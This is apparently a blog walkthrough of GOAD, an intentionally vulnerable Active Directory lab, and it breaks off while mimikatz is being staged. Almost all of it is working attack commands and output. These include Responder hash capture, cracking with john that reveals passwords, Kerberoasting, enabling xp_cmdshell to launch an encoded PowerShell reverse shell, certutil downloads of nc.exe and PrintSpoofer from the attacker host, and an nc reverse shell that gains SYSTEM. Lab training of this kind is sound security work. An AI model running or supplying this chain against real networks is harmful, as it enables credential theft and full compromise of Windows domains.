What is GOAD?
GOAD is an AD environment and its construction tools for the purpose of pentesting exercises.
The repository itself offers a variety of environments, but this time we will cover the most basic environment: 5 VMs, 2 forests, and 3 domains.
Furthermore, since five Windows machines will be running, certain machine specifications are required.
I also prepared a Kali Linux VM for the walkthrough.
Here is my machine.
Ubuntu 22.04.5 LTS, 12-core CPU , 64GB RAM
It worked fine in my environment, so I think it will work without any problems if your machine has sufficient specs.
Building GOAD
We will build the GOAD environment.
However, there is nothing particularly difficult about it; all you need to do is clone the repository and run the command below.
./goad.sh -t install -l GOAD -p virtualbox -m docker ./goad.sh -t start -l GOAD -p virtualbox -m docker
To stop it, run the following command:
./goad.sh -t stop -l GOAD -p virtualbox -m docker
The setup will take some time, so have a cup of tea while you wait. It depends on your machine’s specs, but I personally found it took about 15 minutes for the initial setup, and about 5 minutes to start up the setup environment.
GOAD Walkthrough
Now let’s get started on conquering the GOAD machine.
This time, we aim to obtain Administrator privileges on all five machines.
The machines 192.168.56.0/24will be deployed across all networks, so we will proceed with the strategy based on this assumption.
Recon
I would like to explore the network using nmap or RustScan, but since we know that there are five Windows machines deployed this time, let’s explore using the netexec command
┌──(kali㉿kali)-[~] └─$ nxc smb 192.168.56.0/24 SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
I was able to obtain a variety of information, which can be summarized as follows:
Five machines, three domains.
- Domain: essos.local
- meereen.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)
- braavos.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)(signing:False)
- Domain: north.sevenkingdoms.local
- castelblack.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)(signing:False)
- winterfell.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
- Domain: sevenkingdoms.local
- kingslanding.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
Find the server that is acting as the DC.
The commands are as follows:
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Do this for each domain.
┌──(kali㉿kali)-[~] └─$ nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10 Server: 192.168.56.10 Address: 192.168.56.10#53 _ldap._tcp.dc._msdcs.sevenkingdoms.local service = 0 100 389 kingslanding.sevenkingdoms.local. ┌──(kali㉿kali)-[~] └─$ nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local 192.168.56.10 Server: 192.168.56.10 Address: 192.168.56.10#53 Non-authoritative answer: _ldap._tcp.dc._msdcs.north.sevenkingdoms.local service = 0 100 389 winterfell.north.sevenkingdoms.local. Authoritative answers can be found from: winterfell.north.sevenkingdoms.local internet address = 192.168.56.11 ┌──(kali㉿kali)-[~] └─$ nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local 192.168.56.10 Server: 192.168.56.10 Address: 192.168.56.10#53 Non-authoritative answer: _ldap._tcp.dc._msdcs.essos.local service = 0 100 389 meereen.essos.local. Authoritative answers can be found from: meereen.essos.local internet address = 192.168.56.12
Now that we have the IP addresses of the DCs that correspond to various domains, /etc/hostslet’s update them.
┌──(kali㉿kali)-[~] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali # GOAD 192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding 192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell 192.168.56.12 essos.local meereen.essos.local meereen 192.168.56.22 castelblack.north.sevenkingdoms.local castelblack 192.168.56.23 braavos.essos.local braavos ::1 localhostavos ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
Responder
Now, let’s see if we can capture any authentication information using Responder.
┌──(kali㉿kali)-[~] └─$ sudo responder -I eth1 __ .----.----.------.-----.------.-----.--| |.----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| | __| NBT-NS, LLMNR & MDNS Responder 3.1.4.0 To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [eth1] Responder IP [192.168.56.104] Responder IPv6 [fe80::5af0:79:dd52:80d1] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] [+] Current Session Variables: Responder Machine Name [WIN-YPREFKD6ZBU] Responder Domain Name [NMYV.LOCAL] Responder DCE-RPC Port [48610] [+] Listening for events... [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server) [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140 [SMB] NTLMv2-SSP Username : NORTH\robb.stark [SMB] NTLMv2-SSP Hash : robb.stark::NORTH:d186ef4b2d5f70e9:0E29C7FA08D6D94EA56390D123A5A422: [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned sent answer to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] Skipping previously captured hash for NORTH\robb.stark [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] Skipping previously captured hash for NORTH\robb.stark [*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server) [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren [SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140 [SMB] NTLMv2-SSP Username : NORTH\eddard.stark [SMB] NTLMv2-SSP Hash : eddard.stark::NORTH:7acc26627de9f50b:8B925C1E0C815B42E9D34D1830847365: [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren [*] Skipping previously captured hash for NORTH\eddard.stark [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren [*] Skipping previously captured hash for NORTH\eddard.stark [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] Skipping previously captured hash for NORTH\robb.stark [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] Skipping previously captured hash for NORTH\robb.stark [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local [*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos [*] Skipping previously captured hash for NORTH\robb.stark [+] Exiting...
I was able to immediately obtain two NTLM hashes.
robb.starkLet’s crack the hash of
┌──(kali㉿kali)-[~/goad/winterfell] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 9 password hashes with 9 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status sexywolfy (robb.stark) 6g 0:00:00:14 DONE (2024-10-06 15:40) 0.4276g/s 1022Kp/s 3622Kc/s 3622KC/s !)(OPPQR..*7¡Vamos! Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
robb.stark/sexywolfyI was able to obtain the credentials.
Let’s use NetExec to see how far these credentials can be used.
First, SMB
┌──(kali㉿kali)-[~/goad/winterfell] └─$ nxc smb 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy' SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.12 445 MEEREEN [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!) SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE SMB 192.168.56.23 445 BRAAVOS [+] essos.local\robb.stark:sexywolfy SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\robb.stark:sexywolfy Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Next is winrm.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ nxc winrm 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy' WINRM 192.168.56.11 5985 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) WINRM 192.168.56.10 5985 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) WINRM 192.168.56.12 5985 MEEREEN [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) WINRM 192.168.56.22 5985 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) WINRM 192.168.56.11 5985 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!) WINRM 192.168.56.23 5985 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) WINRM 192.168.56.23 5985 BRAAVOS [-] essos.local\robb.stark:sexywolfy WINRM 192.168.56.12 5985 MEEREEN [-] essos.local\robb.stark:sexywolfy WINRM 192.168.56.22 5985 CASTELBLACK [-] north.sevenkingdoms.local\robb.stark:sexywolfy WINRM 192.168.56.10 5985 KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Winterfell Walkthrough (User Permissions)
Looks like you can use your credentials in WINTERFELL.
Let’s try entering it with evil-winrm.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ evil-winrm -u robb.stark -p sexywolfy -i winterfell.north.sevenkingdoms.local Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\robb.stark\Documents>
I was able to get in safely.
Let’s try listing the users.
*Evil-WinRM* PS C:\Users\robb.stark\Documents> net user User accounts for \\ ------------------------------------------------------------------------------ Administrator arya.stark brandon.stark catelyn.stark eddard.stark Guest hodor jeor.mormont jon.snow krbtgt rickon.stark robb.stark samwell.tarly sansa.stark sql_svc vagrant The command completed with one or more errors. *Evil-WinRM* PS C:\Users\robb.stark\Documents>
The results are compiled in users.txt.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ cat users.txt Administrator arya.stark brandon.stark cetelyn.stark eddard.stark Guest hodor jeor.mormont jon.snow krbtgt rickon.stark robb.stark samwell.tarly sansa.stark sql_svc
Let’s check if Kerberos is possible.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-GetUserSPNs -dc-ip winterfell north.sevenkingdoms.local/"robb.stark":"sexywolfy" -request -k Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Getting machinename [-] CCache file is not found. Skipping... ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation --------------------------------------------------- ----------- -------------------------------------------- -------------------------- -------------------------- ------------- HTTP/eyrie.north.sevenkingdoms.local sansa.stark CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2024-08-10 23:42:13.018886 <never> unconstrained CIFS/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2024-08-10 23:42:20.300231 <never> constrained HTTP/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2024-08-10 23:42:20.300231 <never> constrained MSSQLSvc/castelblack.north.sevenkingdoms.local sql_svc 2024-08-10 23:42:25.706411 2024-10-06 15:29:36.777610 MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 sql_svc 2024-08-10 23:42:25.706411 2024-10-06 15:29:36.777610 [-] CCache file is not found. Skipping... $krb5tgs$23$*sansa.stark$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sansa.stark*$bf87ed85f509050cb9c4bc9bc1ebc4b3$ $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1e15ebd4698ad759a436a2f71a909132$ $krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$f2afc954ac537ec194d071e3bd454869$650
Let’s try cracking the hash of jon.snow, a user with constrained delegation.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ john --format=krb5tgs jon.snow.krb5tgts --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status iknownothing (?) 1g 0:00:00:02 DONE (2024-10-06 16:09) 0.3378g/s 2511Kp/s 2511Kc/s 2511KC/s ikulet..ikkezelf85 Use the "--show" option to display all of the cracked passwords reliably Session completed.
jon.snow/iknownothingI got the credential.
CASTELBLACK Exploit (Securing Administrator Privileges from MSSQL)
jon.snow has access to MSSQL in CASTELBLACK.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ nxc mssql 192.168.56.10-12 192.168.56.22-23 -u jon.snow -p 'iknownothing' MSSQL 192.168.56.22 1433 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) MSSQL 192.168.56.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!) MSSQL 192.168.56.23 1433 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) MSSQL 192.168.56.23 1433 BRAAVOS [-] essos.local\jon.snow:iknownothing (Login failed for user 'BRAAVOS\Guest'. Please try again with or without '--local-auth') Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Let’s access MSSQL.
$ impacket-mssqlclient north.sevenkingdoms.local/jon.snow:iknownothing@castelblack -windows-auth Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Value Old: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (NORTH\jon.snow dbo@master)>
Let’s find out who the system administrator is for this server.
SQL (NORTH\jon.snow dbo@master)> select loginname from syslogins where sysadmin = '1' loginname --------------------------- sa NORTH\sql_svc NT SERVICE\SQLWriter NT SERVICE\Winmgmt NT SERVICE\MSSQL$SQLEXPRESS CASTELBLACK\vagrant NORTH\jon.snow
You can see that the user jon.snow is listed as a sysadmin.
Enable xp_cmdshell and create a reverse shell (you can create a reverse shell at the following site: https://www.revshells.com/ )
First, listen with netcat:
$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:c7:e1:36 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0 valid_lft 72631sec preferred_lft 72631sec inet6 fe80::e4c7:3d51:e066:24c9/64 scope link noprefixroute valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:58:30:f4 brd ff:ff:ff:ff:ff:ff inet 192.168.56.104/24 brd 192.168.56.255 scope global dynamic noprefixroute eth1 valid_lft 334sec preferred_lft 334sec inet6 fe80::5af0:79:dd52:80d1/64 scope link noprefixroute valid_lft forever preferred_lft forever ┌──(kali㉿kali)-[~/goad/castelblack] └─$ rlwrap nc -lvnp 443
Next, create a reverse shell in MSSQL.
SQL (NORTH\jon.snow dbo@master)> sp_configure 'show advanced options', '1' [*] INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (NORTH\jon.snow dbo@master)> reconfigure SQL (NORTH\jon.snow dbo@master)> sp_configure 'xp_cmdshell', 1 [*] INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (NORTH\jon.snow dbo@master)> reconfigure SQL (NORTH\jon.snow dbo@master)> xp_cmdshell powershell -e +ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIArACAAIgBQAFMAIAAiACAAKwA gACgAcAB3AGQAKQAuAFAAYQB0AGgAIArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwB DAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAA sACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
When listening, you can get a reverse shell like this:
┌──(kali㉿kali)-[~] └─$ rlwrap nc -lvnp 443 listening on [any] 443 ... connect to [192.168.56.104] from (UNKNOWN) [192.168.56.22] 55053 PS C:\Windows\system32>
Let’s look at the permissions we have.
PS C:\Windows\system32> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================================================================== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled PS C:\Windows\system32>
SeImpersonatePrivilegeSince it is valid, I will try to use PrintSpoofer. https://github.com/itm4n/PrintSpoofer
For now, we will transport PrintSpoofer.
┌──(kali㉿kali)-[~/goad/castelblack] └─$ ls castelblack.nmap nc.exe PrintSpoofer64.exe SharpHound.ps1 mimikatz.exe powerview.ps1 SharpHound.exe ┌──(kali㉿kali)-[~/goad/castelblack] └─$ python2 -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... (I'm running it with Python2 because the built-in HTTP server in Python3 didn't work properly)
On the CASTELBLACK side, move to /tmp as shown below. This is where you will import various tools.
PS C:\Windows\system32> cd /tmp PS C:\tmp> certutil -urlcache -split -f http://192.168.56.104:8080/nc.exe **** Online **** 0000 ... e800 CertUtil: -URLCache command completed successfully. PS C:\tmp> certutil -urlcache -split -f http://192.168.56.104:8080/PrintSpoofer64.exe **** Online **** 0000 ... 6a00 CertUtil: -URLCache command completed successfully.
On the Kali side, open the port using Netcat.
┌──(kali㉿kali)-[~] └─$ rlwrap nc -lvnp 80 listening on [any] 80 ...
Run PrintSpoofer with PowerShell
PS C:\tmp> .\PrintSpoofer64.exe -i -c ".\nc.exe 192.168.56.104 80 -e powershell"
A reverse shell has been established. You can confirm with whoami that you have system administrator privileges.
┌──(kali㉿kali)-[~] └─$ rlwrap nc -lvnp 80 listening on [any] 80 ... connect to [192.168.56.104] from (UNKNOWN) [192.168.56.22] 55063 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> PS C:\Windows\system32> whoami whoami nt authority\system PS C:\Windows\system32> whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ======================================== ========================================================================== SeCreateTokenPrivilege Create a token object Enabled SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege authentication Impersonate a client after Enabled SeCreateGlobalPrivilege Create global objects Enabled SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled SeRelabelPrivilege Modify an object label Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Next, deliver mimikatz.
First, make mimikatz available for download via HTTP on the attacker’s machine.
$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe . ┌──(kali㉿kali)-[~/goad/castelblack] └─$ python2 -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ..
